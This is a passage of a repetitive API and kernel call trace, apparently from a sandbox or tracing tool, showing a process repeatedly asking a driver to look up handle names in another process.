lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xd6, lpOverlapped=0x0) returned 1 [0147.552] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.552] PsAcquireProcessExitSynchronization () returned 0x0 [0147.552] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.552] ObReferenceObjectByHandle (in: Handle=0x7e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003694730, HandleInformation=0x0) returned 0x0 [0147.553] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.553] PsReleaseProcessExitSynchronization () returned 0x2 [0147.553] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.553] ObQueryNameString (in: Object=0xfffffa8003694730, ObjectNameInfo=0xfffffa8002fa0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa0044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.553] ObfDereferenceObject (Object=0xfffffa8003694730) returned 0x2 [0147.553] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.553] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.553] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.553] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xd6, lpOverlapped=0x0) returned 1 [0147.553] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.553] PsAcquireProcessExitSynchronization () returned 0x0 [0147.553] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.554] ObReferenceObjectByHandle (in: Handle=0x7f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039e9f20, HandleInformation=0x0) returned 0x0 [0147.554] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.554] PsReleaseProcessExitSynchronization () returned 0x2 [0147.554] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.554] ObQueryNameString (in: Object=0xfffffa80039e9f20, ObjectNameInfo=0xfffffa8002fd7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd7044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.554] ObfDereferenceObject (Object=0xfffffa80039e9f20) returned 0x2 [0147.554] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.554] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.554] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.554] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0147.555] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.555] PsAcquireProcessExitSynchronization () returned 0x0 [0147.555] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.555] ObReferenceObjectByHandle (in: Handle=0x854, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034eb920, HandleInformation=0x0) returned 0x0 [0147.555] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.555] PsReleaseProcessExitSynchronization () returned 0x2 [0147.555] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.555] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002faa044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002faa044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.555] ObfDereferenceObject (Object=0xfffffa80034eb920) returned 0x1 [0147.555] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.555] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.555] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.555] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0147.556] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.556] PsAcquireProcessExitSynchronization () returned 0x0 [0147.556] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.556] ObReferenceObjectByHandle (in: Handle=0x86c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80029511f0, HandleInformation=0x0) returned 0x0 [0147.556] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.556] PsReleaseProcessExitSynchronization () returned 0x2 [0147.556] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.556] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd0584, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd0584, ReturnLength=0xfffff88005163508) returned 0x0 [0147.556] ObfDereferenceObject (Object=0xfffffa80029511f0) returned 0x1 [0147.556] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.556] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.557] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.557] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0147.557] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.557] PsAcquireProcessExitSynchronization () returned 0x0 [0147.557] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.557] ObReferenceObjectByHandle (in: Handle=0x87c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003adb1f0, HandleInformation=0x0) returned 0x0 [0147.557] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.557] PsReleaseProcessExitSynchronization () returned 0x2 [0147.557] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.557] ObQueryNameString (in: Object=0xfffffa8003adb1f0, ObjectNameInfo=0xfffffa80030277c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030277c4, ReturnLength=0xfffff88005163550) returned 0x0 [0147.558] ObfDereferenceObject (Object=0xfffffa8003adb1f0) returned 0x10 [0147.558] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.558] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.558] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.558] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0147.558] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.559] PsAcquireProcessExitSynchronization () returned 0x0 [0147.559] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.559] ObReferenceObjectByHandle (in: Handle=0x8d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001edc240, HandleInformation=0x0) returned 0x0 [0147.559] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.559] PsReleaseProcessExitSynchronization () returned 0x2 [0147.559] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.559] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fdc044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fdc044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.559] ObfDereferenceObject (Object=0xfffffa8001edc240) returned 0x1 [0147.559] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.559] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.559] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.559] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0147.560] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.560] PsAcquireProcessExitSynchronization () returned 0x0 [0147.560] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.560] ObReferenceObjectByHandle (in: Handle=0x910, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0147.560] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.560] PsReleaseProcessExitSynchronization () returned 0x2 [0147.560] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.560] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8002fdb044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fdb044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.560] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0147.560] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.560] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.560] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.560] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0147.561] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.561] PsAcquireProcessExitSynchronization () returned 0x0 [0147.561] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.561] ObReferenceObjectByHandle (in: Handle=0x94c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f9c4a0, HandleInformation=0x0) returned 0x0 [0147.561] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.561] PsReleaseProcessExitSynchronization () returned 0x2 [0147.561] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.561] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fda044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fda044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.561] ObfDereferenceObject (Object=0xfffffa8001f9c4a0) returned 0x1 [0147.561] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.561] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.561] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.561] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0147.561] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.561] PsAcquireProcessExitSynchronization () returned 0x0 [0147.562] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.562] ObReferenceObjectByHandle (in: Handle=0x950, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003ab6070, HandleInformation=0x0) returned 0x0 [0147.562] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.562] PsReleaseProcessExitSynchronization () returned 0x2 [0147.562] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.562] ObQueryNameString (in: Object=0xfffffa8003ab6070, ObjectNameInfo=0xfffffa8002fd9044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd9044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.562] ObfDereferenceObject (Object=0xfffffa8003ab6070) returned 0x1 [0147.562] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.562] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.562] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.562] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0147.562] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.562] PsAcquireProcessExitSynchronization () returned 0x0 [0147.562] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.563] ObReferenceObjectByHandle (in: Handle=0x958, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0147.563] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.563] PsReleaseProcessExitSynchronization () returned 0x2 [0147.563] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.563] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa8002fd5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd5044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.563] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xd [0147.563] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.563] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.563] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.563] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0147.563] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.563] PsAcquireProcessExitSynchronization () returned 0x0 [0147.563] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.563] ObReferenceObjectByHandle (in: Handle=0x980, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003525c70, HandleInformation=0x0) returned 0x0 [0147.564] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.564] PsReleaseProcessExitSynchronization () returned 0x2 [0147.564] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.564] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd4044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.564] ObfDereferenceObject (Object=0xfffffa8003525c70) returned 0x1 [0147.564] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.564] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.564] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.564] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0147.564] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.564] PsAcquireProcessExitSynchronization () returned 0x0 [0147.564] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.564] ObReferenceObjectByHandle (in: Handle=0x984, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003ab4cf0, HandleInformation=0x0) returned 0x0 [0147.564] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.564] PsReleaseProcessExitSynchronization () returned 0x2 [0147.564] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.565] ObQueryNameString (in: Object=0xfffffa8003ab4cf0, ObjectNameInfo=0xfffffa8002fd3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd3044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.565] ObfDereferenceObject (Object=0xfffffa8003ab4cf0) returned 0x1 [0147.565] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.565] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.565] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.565] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0147.565] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.565] PsAcquireProcessExitSynchronization () returned 0x0 [0147.565] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.565] ObReferenceObjectByHandle (in: Handle=0x9f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a949e0, HandleInformation=0x0) returned 0x0 [0147.566] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.566] PsReleaseProcessExitSynchronization () returned 0x2 [0147.566] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.566] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd2044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd2044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.566] ObfDereferenceObject (Object=0xfffffa8003a949e0) returned 0x1 [0147.566] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.566] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.566] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.566] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0147.566] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.566] PsAcquireProcessExitSynchronization () returned 0x0 [0147.567] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.567] ObReferenceObjectByHandle (in: Handle=0xa20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a94890, HandleInformation=0x0) returned 0x0 [0147.567] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.567] PsReleaseProcessExitSynchronization () returned 0x2 [0147.567] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.567] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fe6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fe6044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.567] ObfDereferenceObject (Object=0xfffffa8003a94890) returned 0x1 [0147.567] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.567] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.567] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.567] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0147.568] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.568] PsAcquireProcessExitSynchronization () returned 0x0 [0147.568] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.568] ObReferenceObjectByHandle (in: Handle=0xa34, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039b5dd0, HandleInformation=0x0) returned 0x0 [0147.568] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.568] PsReleaseProcessExitSynchronization () returned 0x2 [0147.568] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.568] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fe7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fe7044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.568] ObfDereferenceObject (Object=0xfffffa80039b5dd0) returned 0x1 [0147.568] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.568] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.569] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.569] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0147.569] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.569] PsAcquireProcessExitSynchronization () returned 0x0 [0147.569] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.569] ObReferenceObjectByHandle (in: Handle=0xa3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800399c230, HandleInformation=0x0) returned 0x0 [0147.569] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.569] 